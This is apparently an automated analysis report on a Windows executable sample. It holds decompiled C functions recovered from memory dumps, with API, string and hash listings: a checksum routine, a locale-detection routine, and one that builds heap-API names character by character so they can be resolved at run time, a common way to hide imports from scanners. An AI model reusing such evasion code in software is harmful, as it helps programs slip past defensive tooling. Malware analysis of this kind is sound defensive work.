0x000000ff ^ _t84) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + ((_t52[1] & 0x000000ff ^ (((_t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + (( *_t50 & 0x000000ff ^ _t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + ((_t50[1] & 0x000000ff ^ (_t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + (( *_t50 & 0x000000ff ^ _t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + ((_t51[1] & 0x000000ff ^ ((_t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + (( *_t50 & 0x000000ff ^ _t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + ((_t50[1] & 0x000000ff ^ (_t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + (( *_t50 & 0x000000ff ^ _t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + ((_t54[1] & 0x000000ff ^ (((((_t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + (( *_t50 & 0x000000ff ^ _t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + ((_t50[1] & 0x000000ff ^ (_t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + (( *_t50 & 0x000000ff ^ _t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + ((_t51[1] & 0x000000ff ^ ((_t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + (( *_t50 & 0x000000ff ^ _t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + ((_t50[1] & 0x000000ff ^ (_t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + (( *_t50 & 0x000000ff ^ _t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + ((_t52[1] & 0x000000ff ^ (((_t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + (( *_t50 & 0x000000ff ^ _t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + ((_t50[1] & 0x000000ff ^ (_t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + (( *_t50 & 0x000000ff ^ _t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + ((_t51[1] & 0x000000ff ^ ((_t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + (( *_t50 & 0x000000ff ^ _t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + ((_t50[1] & 0x000000ff ^ (_t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + (( *_t50 & 0x000000ff ^ _t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + ((_t53[1] & 0x000000ff ^ ((((_t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + (( *_t50 & 0x000000ff ^ _t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + ((_t50[1] & 0x000000ff ^ (_t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + (( *_t50 & 0x000000ff ^ _t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + ((_t51[1] & 0x000000ff ^ ((_t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + (( *_t50 & 0x000000ff ^ _t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + ((_t50[1] & 0x000000ff ^ (_t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + (( *_t50 & 0x000000ff ^ _t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + ((_t52[1] & 0x000000ff ^ (((_t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + (( *_t50 & 0x000000ff ^ _t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + ((_t50[1] & 0x000000ff ^ (_t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + (( *_t50 & 0x000000ff ^ _t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + ((_t51[1] & 0x000000ff ^ ((_t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + (( *_t50 & 0x000000ff ^ _t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + ((_t50[1] & 0x000000ff ^ (_t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4445f0 + (( *_t50 & 0x000000ff ^ _t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4);
							_t49 =  &(_t55[2]);
							_t82 = _t82 - 8;
							_t88 = _t88 - 1;
							_t84 = _t45 >> 0x00000008 ^  *(0x4445f0 + ((_t55[1] & 0x000000ff ^ _t45) & 0x000000ff) * 4);
						} while (_t88 != 0);
					}
					if(_t82 != 0) {
						do {
							_t84 = _t84 >> 0x00000008 ^  *(0x4445f0 + (( *_t49 & 0x000000ff ^ _t84) & 0x000000ff) * 4);
							_t49 =  &(_t49[1]);
							_t82 = _t82 - 1;
						} while (_t82 != 0);
					}
					return  !_t84;
				} else {
					return 0;
				}
			}

0x004074b0
0x004074b4
0x004074b8
0x004074c2
0x004074c4
0x004074cd
0x004074d0
0x004074db
0x0040750b
0x0040751e
0x00407537
0x00407550
0x00407567
0x00407575
0x00407595
0x00407598
0x0040759b
0x0040759e
0x0040759e
0x004075a6
0x004075a9
0x004075b0
0x004075bd
0x004075c4
0x004075c7
0x004075c7
0x004075b0
0x004075d2
0x004074bb
0x004074be
0x004074be

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0acda3938b184e325c76189745cbda4e91d2dd2b286f122a3ca0b7cf3b5ac864
Instruction ID: b448d999c7b8894b450fddb0c55834abf7122bb0109b4b8fa129d185383b5170
Opcode Fuzzy Hash: 0acda3938b184e325c76189745cbda4e91d2dd2b286f122a3ca0b7cf3b5ac864
Instruction Fuzzy Hash: CD21B0329784B616DB409B35FC103722BD3DBC7606F1E81B5D74486B8AE43EAA13A574

Uniqueness

Uniqueness Score: -1.00%

Function 00402D10, Relevance: 66.6, APIs: 6, Strings: 32, Instructions: 121
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00402D10(void* __ebp, intOrPtr _a4, intOrPtr _a8) {
				signed int _v4;
				char _v6;
				char _v7;
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				signed int _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				char _v35;
				char _v36;
				char _v37;
				char _v38;
				char _v39;
				char _v40;
				char _v41;
				char _v42;
				char _v43;
				char _v44;
				char _v48;
				char _v49;
				char _v50;
				char _v51;
				char _v52;
				char _v53;
				char _v54;
				char _v55;
				char _v56;
				char _v57;
				char _v58;
				char _v59;
				char _v60;
				_Unknown_base(*)()* _v64;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t68;
				_Unknown_base(*)()* _t77;
				void* _t80;
				void* _t84;
				void* _t85;
				intOrPtr* _t99;
				intOrPtr _t101;

				_t102 =  &_v68;
				_t68 =  *0x44f5d0; // 0x765b253d
				_v4 = _t68 ^  &_v68;
				_t101 = _a4;
				_v59 = 0x45;
				_v56 = 0x45;
				_v12 = 0x73;
				_v11 = 0x73;
				_v60 = 0x4b;
				_v58 = 0x52;
				_v57 = 0x4e;
				_v55 = 0x4c;
				_v54 = 0x33;
				_v53 = 0x32;
				_v52 = 0x2e;
				_v51 = 0x64;
				_v50 = 0x6c;
				_v49 = 0x6c;
				_v48 = 0;
				_v20 = 0x47;
				_v19 = 0x65;
				_v18 = 0x74;
				_v17 = 0x50;
				_v16 = 0x72;
				_v15 = 0x6f;
				_v14 = 0x63;
				_v13 = 0x65;
				_v10 = 0x48;
				_v9 = 0x65;
				_v8 = 0x61;
				_v7 = 0x70;
				_v6 = 0;
				_v68 = GetProcAddress(LoadLibraryA( &_v60),  &_v20);
				_v32 = 0x48;
				_v31 = 0x65;
				_v30 = 0x61;
				_v29 = 0x70;
				_v28 = 0x52;
				_v27 = 0x65;
				_v26 = 0x41;
				_v25 = 0x6c;
				_v24 = 0x6c;
				_v23 = 0x6f;
				_v22 = 0x63;
				_v21 = 0;
				_t77 = GetProcAddress(LoadLibraryA( &_v60),  &_v32);
				_t48 =  &_v44; // 0x2e
				_v64 = _t77;
				_v44 = 0x48;
				_v43 = 0x65;
				_v42 = 0x61;
				_v41 = 0x70;
				_v40 = 0x41;
				_v39 = 0x6c;
				_v38 = 0x6c;
				_v37 = 0x6f;
				_v36 = 0x63;
				_v35 = 0;
				_t99 = GetProcAddress(LoadLibraryA( &_v60), _t48);
				if(_t101 == 0) {
					_t80 = _v68(0, _a8);
					return E0042569C( *_t99(), 0x65, _v16 ^ _t102,  &_v60, GetProcAddress, _t99, _t80);
				} else {
					_t84 = _v68(0, _t101, _a8);
					_t85 = _v64();
					_t64 =  &_v20; // 0x52
					return E0042569C(_t85, 0x65,  *_t64 ^ _t102,  &_v60, GetProcAddress, _t99, _t84);
				}
			}

0x00402d10
0x00402d13
0x00402d1a
0x00402d20
0x00402d2d
0x00402d31
0x00402d38
0x00402d3c
0x00402d4c
0x00402d51
0x00402d56
0x00402d5b
0x00402d60
0x00402d65
0x00402d6a
0x00402d6f
0x00402d74
0x00402d79
0x00402d7e
0x00402d83
0x00402d88
0x00402d8c
0x00402d91
0x00402d96
0x00402d9b
0x00402da0
0x00402da5
0x00402da9
0x00402dae
0x00402db2
0x00402db7
0x00402dbc
0x00402dd0
0x00402dda
0x00402ddf
0x00402de3
0x00402de8
0x00402ded
0x00402df2
0x00402df6
0x00402dfb
0x00402e00
0x00402e05
0x00402e0a
0x00402e0f
0x00402e17
0x00402e19
0x00402e23
0x00402e27
0x00402e2c
0x00402e30
0x00402e35
0x00402e3a
0x00402e3f
0x00402e44
0x00402e49
0x00402e4e
0x00402e53
0x00402e5f
0x00402e61
0x00402e8e
0x00402ea7
0x00402e63
0x00402e6b
0x00402e70
0x00402e78
0x00402e86
0x00402e86

APIs

LoadLibraryA.KERNEL32 ref: 00402DC1
GetProcAddress.KERNEL32(00000000), ref: 00402DCA
LoadLibraryA.KERNEL32(?,?), ref: 00402E14
GetProcAddress.KERNEL32(00000000), ref: 00402E17
LoadLibraryA.KERNEL32(?,.23L), ref: 00402E58
GetProcAddress.KERNEL32(00000000), ref: 00402E5B

Strings

a, xrefs: 00402E30
P, xrefs: 00402D91
t, xrefs: 00402D8C
A, xrefs: 00402E3A
o, xrefs: 00402E05
.23L, xrefs: 00402E19, 00402E1D
H, xrefs: 00402DDA
Rpa, xrefs: 00402E78
L, xrefs: 00402D5B
H, xrefs: 00402DA9
o, xrefs: 00402D9B
r, xrefs: 00402D96
N, xrefs: 00402D56
3, xrefs: 00402D60
p, xrefs: 00402DE8
c, xrefs: 00402E4E
R, xrefs: 00402D51
l, xrefs: 00402E44
p, xrefs: 00402DB7
l, xrefs: 00402E00
K, xrefs: 00402D4C
c, xrefs: 00402E0A
l, xrefs: 00402E3F
2, xrefs: 00402D65
p, xrefs: 00402E35
o, xrefs: 00402E49
G, xrefs: 00402D83
c, xrefs: 00402DA0
a, xrefs: 00402DB2
a, xrefs: 00402DE3
H, xrefs: 00402E27
l, xrefs: 00402DFB

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: .23L$2$3$A$G$H$H$H$K$L$N$P$R$Rpa$a$a$a$c$c$c$l$l$l$l$o$o$o$p$p$p$r$t
API String ID: 2574300362-1209862703
Opcode ID: bd2a57f1d95169d0685393ee62aff27c5d0bd33e93c9856fa2f4463bdb7e271c
Instruction ID: f0d58c420db290d49952ccd9179236ad68bce969cef9e32a75ca4a007b97abd8
Opcode Fuzzy Hash: bd2a57f1d95169d0685393ee62aff27c5d0bd33e93c9856fa2f4463bdb7e271c
Instruction Fuzzy Hash: CC51E46150C3C0DEE352D7688448B5FFFE55BA6648F88099DF2C84B282C6BA9518C77B

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACCE, Relevance: 45.7, APIs: 21, Strings: 5, Instructions: 229
registrylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040ACCE(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t73;
				struct HINSTANCE__* _t78;
				_Unknown_base(*)()* _t79;
				struct HINSTANCE__* _t81;
				signed int _t92;
				signed int _t94;
				unsigned int _t97;
				void* _t113;
				unsigned int _t115;
				signed short _t123;
				unsigned int _t124;
				_Unknown_base(*)()* _t131;
				signed short _t133;
				unsigned int _t134;
				intOrPtr _t143;
				void* _t144;
				int _t145;
				int _t146;
				signed int _t164;
				void* _t167;
				signed int _t169;
				void* _t170;
				int _t172;
				signed int _t176;
				void* _t177;
				CHAR* _t181;
				void* _t183;
				void* _t184;

				_t167 = __edx;
				_t184 = _t183 - 0x118;
				_t181 = _t184 - 4;
				_t73 =  *0x44f5d0; // 0x765b253d
				_t181[0x118] = _t73 ^ _t181;
				_push(0x58);
				E004271DA(E004398DF, __ebx, __edi, __esi);
				_t169 = 0;
				 *(_t181 - 0x40) = _t181[0x124];
				 *(_t181 - 0x14) = 0;
				 *(_t181 - 0x10) = 0;
				_t78 = GetModuleHandleA("kernel32.dll");
				 *(_t181 - 0x18) = _t78;
				_t79 = GetProcAddress(_t78, "GetUserDefaultUILanguage");
				if(_t79 == 0) {
					if(GetVersion() >= 0) {
						_t81 = GetModuleHandleA("ntdll.dll");
						if(_t81 != 0) {
							 *(_t181 - 0x14) = 0;
							EnumResourceLanguagesA(_t81, 0x10, 1, E0040A45B, _t181 - 0x14);
							if( *(_t181 - 0x14) != 0) {
								_t97 =  *(_t181 - 0x14) & 0x0000ffff;
								_t145 = _t97 & 0x3ff;
								 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t97 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t145);
								 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t145);
								 *(_t181 - 0x10) = 2;
							}
						}
					} else {
						 *(_t181 - 0x18) = 0;
						if(RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019, _t181 - 0x18) == 0) {
							 *(_t181 - 0x44) = 0x10;
							if(RegQueryValueExA( *(_t181 - 0x18), 0, 0, _t181 - 0x20,  &(_t181[0x108]), _t181 - 0x44) == 0 &&  *(_t181 - 0x20) == 1) {
								_t113 = E00427892( &(_t181[0x108]), "%x", _t181 - 0x1c);
								_t184 = _t184 + 0xc;
								if(_t113 == 1) {
									 *(_t181 - 0x14) =  *(_t181 - 0x1c) & 0x0000ffff;
									_t115 =  *(_t181 - 0x1c) & 0x0000ffff;
									_t146 = _t115 & 0x3ff;
									 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t115 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t146);
									 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t146);
									 *(_t181 - 0x10) = 2;
								}
							}
							RegCloseKey( *(_t181 - 0x18));
						}
					}
				} else {
					_t123 =  *_t79() & 0x0000ffff;
					 *(_t181 - 0x14) = _t123;
					_t124 = _t123 & 0x0000ffff;
					_t164 = _t124 & 0x3ff;
					 *(_t181 - 0x1c) = _t164;
					 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t124 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t164);
					 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale( *(_t181 - 0x1c));
					 *(_t181 - 0x10) = 2;
					_t131 = GetProcAddress( *(_t181 - 0x18), "GetSystemDefaultUILanguage");
					if(_t131 != 0) {
						_t133 =  *_t131() & 0x0000ffff;
						 *(_t181 - 0x14) = _t133;
						_t134 = _t133 & 0x0000ffff;
						_t172 = _t134 & 0x3ff;
						 *((intOrPtr*)(_t181 - 0x2c)) = ConvertDefaultLocale(_t134 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t172);
						 *((intOrPtr*)(_t181 - 0x28)) = ConvertDefaultLocale(_t172);
						 *(_t181 - 0x10) = 4;
					}
					_t169 = 0;
				}
				 *(_t181 - 0x10) =  &(1[ *(_t181 - 0x10)]);
				_t181[ *(_t181 - 0x10) * 4 - 0x34] = 0x800;
				_t181[0x105] = 0;
				_t181[0x104] = 0;
				if(GetModuleFileNameA(0x400000, _t181, 0x105) != _t169) {
					_t143 = 0x20;
					E004277B0(_t169, _t181 - 0x64, _t169, _t143);
					 *((intOrPtr*)(_t181 - 0x64)) = _t143;
					 *(_t181 - 0x5c) = _t181;
					 *((intOrPtr*)(_t181 - 0x50)) = 0x3e8;
					 *(_t181 - 0x48) = 0x400000;
					 *((intOrPtr*)(_t181 - 0x60)) = 0x88;
					E0040A471(_t181 - 0x3c, 0xffffffff);
					 *(_t181 - 4) = _t169;
					if(E0040A521(_t181 - 0x3c, _t181 - 0x64) != 0) {
						E0040A557(_t181 - 0x3c);
					}
					_t176 = 0;
					if( *(_t181 - 0x10) <= _t169) {
						L23:
						 *(_t181 - 4) =  *(_t181 - 4) | 0xffffffff;
						E0040AB64(_t181 - 0x3c);
						_t92 = _t169;
						goto L24;
					} else {
						while(1) {
							_t94 = E0040AA97( *(_t181 - 0x40), _t167, _t181[_t176 * 4 - 0x34]);
							if(_t94 != _t169) {
								break;
							}
							_t176 =  &(1[_t176]);
							if(_t176 <  *(_t181 - 0x10)) {
								continue;
							}
							goto L23;
						}
						_t169 = _t94;
						goto L23;
					}
				} else {
					_t92 = 0;
					L24:
					 *[fs:0x0] =  *((intOrPtr*)(_t181 - 0xc));
					_pop(_t170);
					_pop(_t177);
					_pop(_t144);
					return E0042569C(_t92, _t144, _t181[0x118] ^ _t181, _t167, _t170, _t177);
				}
			}

0x0040acce
0x0040accf
0x0040acd5
0x0040acd9
0x0040ace0
0x0040ace6
0x0040aced
0x0040acfe
0x0040ad05
0x0040ad08
0x0040ad0b
0x0040ad0e
0x0040ad1c
0x0040ad1f
0x0040ad23
0x0040adf1
0x0040aead
0x0040aeb1
0x0040aec5
0x0040aec8
0x0040aed2
0x0040aed8
0x0040aef0
0x0040aefc
0x0040af01
0x0040af04
0x0040af04
0x0040aed2
0x0040adf7
0x0040ae0b
0x0040ae16
0x0040ae2c
0x0040ae3b
0x0040ae53
0x0040ae58
0x0040ae5e
0x0040ae6a
0x0040ae6d
0x0040ae7f
0x0040ae8b
0x0040ae90
0x0040ae93
0x0040ae93
0x0040ae5e
0x0040ae9d
0x0040ae9d
0x0040ae16
0x0040ad29
0x0040ad31
0x0040ad34
0x0040ad37
0x0040ad49
0x0040ad52
0x0040ad5a
0x0040ad67
0x0040ad6a
0x0040ad71
0x0040ad75
0x0040ad79
0x0040ad7c
0x0040ad7f
0x0040ad8c
0x0040ad98
0x0040ad9d
0x0040ada0
0x0040ada0
0x0040ada7
0x0040ada7
0x0040adac
0x0040adaf
0x0040adc6
0x0040adcd
0x0040addc
0x0040af12
0x0040af19
0x0040af29
0x0040af2c
0x0040af2f
0x0040af36
0x0040af39
0x0040af40
0x0040af4c
0x0040af56
0x0040af5b
0x0040af5b
0x0040af60
0x0040af65
0x0040af82
0x0040af82
0x0040af89
0x0040af8e
0x00000000
0x0040af67
0x0040af67
0x0040af6e
0x0040af76
0x00000000
0x00000000
0x0040af78
0x0040af7c
0x00000000
0x00000000
0x00000000
0x0040af7e
0x0040af80
0x00000000
0x0040af80
0x0040ade2
0x0040ade2
0x0040af90
0x0040af93
0x0040af9b
0x0040af9c
0x0040af9d
0x0040afb2
0x0040afb2

APIs

__EH_prolog3.LIBCMT ref: 0040ACED
GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 0040AD0E
GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 0040AD1F
ConvertDefaultLocale.KERNEL32(?), ref: 0040AD55
ConvertDefaultLocale.KERNEL32(?), ref: 0040AD5D
GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 0040AD71
ConvertDefaultLocale.KERNEL32(?), ref: 0040AD95
ConvertDefaultLocale.KERNEL32(000003FF), ref: 0040AD9B
GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040ADD4
GetVersion.KERNEL32 ref: 0040ADE9
RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 0040AE0E
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 0040AE33
_sscanf.LIBCMT ref: 0040AE53
ConvertDefaultLocale.KERNEL32(?), ref: 0040AE88
ConvertDefaultLocale.KERNEL32(74B04EE0), ref: 0040AE8E
RegCloseKey.ADVAPI32(?), ref: 0040AE9D
GetModuleHandleA.KERNEL32(ntdll.dll), ref: 0040AEAD
EnumResourceLanguagesA.KERNEL32 ref: 0040AEC8
ConvertDefaultLocale.KERNEL32(?), ref: 0040AEF9
ConvertDefaultLocale.KERNEL32(74B04EE0), ref: 0040AEFF
_memset.LIBCMT ref: 0040AF19

Strings

Control Panel\Desktop\ResourceLocale, xrefs: 0040AE01
GetUserDefaultUILanguage, xrefs: 0040AD16
ntdll.dll, xrefs: 0040AEA8
GetSystemDefaultUILanguage, xrefs: 0040AD5F
kernel32.dll, xrefs: 0040AD00

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: ConvertDefaultLocale$Module$AddressHandleProc$CloseEnumFileH_prolog3LanguagesNameOpenQueryResourceValueVersion_memset_sscanf
String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
API String ID: 434808117-483790700
Opcode ID: 824ce54658dffb8fd7beb7f4081eeacb5446ed0dd36a4f0e682fb0970251a4da
Instruction ID: 345cb28879e9a89f549b81aa8f1c1e5f89832d8c5dd44fd8d30fdebd39e75dd9
Opcode Fuzzy Hash: 824ce54658dffb8fd7beb7f4081eeacb5446ed0dd36a4f0e682fb0970251a4da
Instruction Fuzzy Hash: 89815EB5D002299ECB10DFA5EC45AFEBBB5EF58304F10452BE454F3280DB789A15CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00402EB0, Relevance: 43.8, APIs: 4, Strings: 21, Instructions: 78
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00402EB0(void* __esi, void* __ebp) {
				signed int _v4;
				char _v6;
				char _v7;
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				signed int _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
